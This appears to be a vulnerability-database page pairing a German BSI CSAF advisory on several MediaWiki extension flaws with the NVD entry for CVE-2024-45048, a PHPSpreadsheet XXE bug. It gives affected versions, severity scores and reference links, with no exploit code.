cpe:/o:fedoraproject:fedora:-
|
— |
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "MediaWiki ist ein freies Wiki, das urspr\u00fcnglich f\u00fcr den Einsatz auf Wikipedia entwickelt wurde.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in MediaWiki ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-3087 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-3087.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-3087 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-3087"
},
{
"category": "external",
"summary": "MediaWiki Extensions and Skins Security Release Supplement vom 2024-10-06",
"url": "https://lists.wikimedia.org/hyperkitty/list/mediawiki-announce@lists.wikimedia.org/thread/HSYMEVZJGTFJ732R62K3BI2AIYPK2AN2/"
},
{
"category": "external",
"summary": "GitHub Advisory Database vom 2024-10-06",
"url": "https://github.com/advisories/GHSA-mmf2-8r78-pm42"
},
{
"category": "external",
"summary": "GitHub Advisory Database vom 2024-10-06",
"url": "https://github.com/advisories/GHSA-jqvm-9xm2-gc38"
},
{
"category": "external",
"summary": "GitHub Advisory Database vom 2024-10-06",
"url": "https://github.com/advisories/GHSA-mmf2-8r78-pm42"
},
{
"category": "external",
"summary": "GitHub Advisory Database vom 2024-10-06",
"url": "https://github.com/advisories/GHSA-q7xp-xjgh-vpm7"
},
{
"category": "external",
"summary": "GitHub Advisory Database vom 2024-10-06",
"url": "https://github.com/advisories/GHSA-rmcp-9fhq-58pv"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-3956 vom 2024-11-17",
"url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00013.html"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-5830 vom 2024-12-12",
"url": "https://lists.debian.org/debian-security-announce/2024/msg00246.html"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-7158-1 vom 2024-12-13",
"url": "https://ubuntu.com/security/notices/USN-7158-1"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-25B16D6561 vom 2025-01-17",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-25b16d6561"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-11277F6779 vom 2025-01-17",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-11277f6779"
}
],
"source_lang": "en-US",
"title": "MediaWiki: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-01-19T23:00:00.000+00:00",
"generator": {
"date": "2025-01-20T09:19:46.896+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.10"
}
},
"id": "WID-SEC-W-2024-3087",
"initial_release_date": "2024-10-06T22:00:00.000+00:00",
"revision_history": [
{
"date": "2024-10-06T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2024-11-17T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Debian aufgenommen"
},
{
"date": "2024-12-12T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Debian und Ubuntu aufgenommen"
},
{
"date": "2025-01-19T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Fedora aufgenommen"
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"category": "product_name",
"name": "Fedora Linux",
"product": {
"name": "Fedora Linux",
"product_id": "74185",
"product_identification_helper": {
"cpe": "cpe:/o:fedoraproject:fedora:-"
}
}
}
],
"category": "vendor",
"name": "Fedora"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.39.9",
"product": {
"name": "Open Source MediaWiki \u003c1.39.9",
"product_id": "T037987"
}
},
{
"category": "product_version",
"name": "1.39.9",
"product": {
"name": "Open Source MediaWiki 1.39.9",
"product_id": "T037987-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mediawiki:mediawiki:1.39.9"
}
}
},
{
"category": "product_version_range",
"name": "\u003c1.41.3",
"product": {
"name": "Open Source MediaWiki \u003c1.41.3",
"product_id": "T037988"
}
},
{
"category": "product_version",
"name": "1.41.3",
"product": {
"name": "Open Source MediaWiki 1.41.3",
"product_id": "T037988-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mediawiki:mediawiki:1.41.3"
}
}
},
{
"category": "product_version_range",
"name": "\u003c1.42.2",
"product": {
"name": "Open Source MediaWiki \u003c1.42.2",
"product_id": "T037989"
}
},
{
"category": "product_version",
"name": "1.42.2",
"product": {
"name": "Open Source MediaWiki 1.42.2",
"product_id": "T037989-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:mediawiki:mediawiki:1.42.2"
}
}
}
],
"category": "product_name",
"name": "MediaWiki"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-35226",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-35226"
},
{
"cve": "CVE-2024-45046",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-45046"
},
{
"cve": "CVE-2024-45048",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-45048"
},
{
"cve": "CVE-2024-47840",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47840"
},
{
"cve": "CVE-2024-47841",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47841"
},
{
"cve": "CVE-2024-47845",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47845"
},
{
"cve": "CVE-2024-47846",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47846"
},
{
"cve": "CVE-2024-47847",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47847"
},
{
"cve": "CVE-2024-47848",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47848"
},
{
"cve": "CVE-2024-47849",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47849"
},
{
"cve": "CVE-2024-47913",
"notes": [
{
"category": "description",
"text": "Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgem\u00e4\u00dfe Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"2951",
"T037987",
"T037988",
"T000126",
"T037989",
"74185"
]
},
"release_date": "2024-10-06T22:00:00.000+00:00",
"title": "CVE-2024-47913"
}
]
}
FKIE_CVE-2024-45048
Vulnerability from fkie_nvd - Published: 2024-08-28 21:15 - Updated: 2024-09-04 17:276.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
| Vendor | Product | Version | |
|---|---|---|---|
| phpoffice | phpspreadsheet | * | |
| phpoffice | phpspreadsheet | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
"matchCriteriaId": "520A70B7-2C60-4064-B452-538ED7A8D30E",
"versionEndExcluding": "1.29.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3D7E4C35-4E3A-42DB-884B-73F028D4A6D6",
"versionEndExcluding": "2.2.1",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions are subject to a bypassing of a filter which allows for an XXE-attack. This in turn allows attacker to obtain contents of local files, even if error reporting is muted. This vulnerability has been addressed in release version 2.2.1. All users are advised to upgrade. There are no known workarounds for this vulnerability."
},
{
"lang": "es",
"value": "PHPSpreadsheet es una librer\u00eda PHP pura para leer y escribir archivos de hojas de c\u00e1lculo. Las versiones afectadas est\u00e1n sujetas a la omisi\u00f3n de un filtro que permite un ataque XXE. Esto, a su vez, permite al atacante obtener el contenido de los archivos locales, incluso si el informe de errores est\u00e1 silenciado. Esta vulnerabilidad se ha solucionado en la versi\u00f3n 2.2.1. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad."
}
],
"id": "CVE-2024-45048",
"lastModified": "2024-09-04T17:27:31.517",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-08-28T21:15:06.817",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.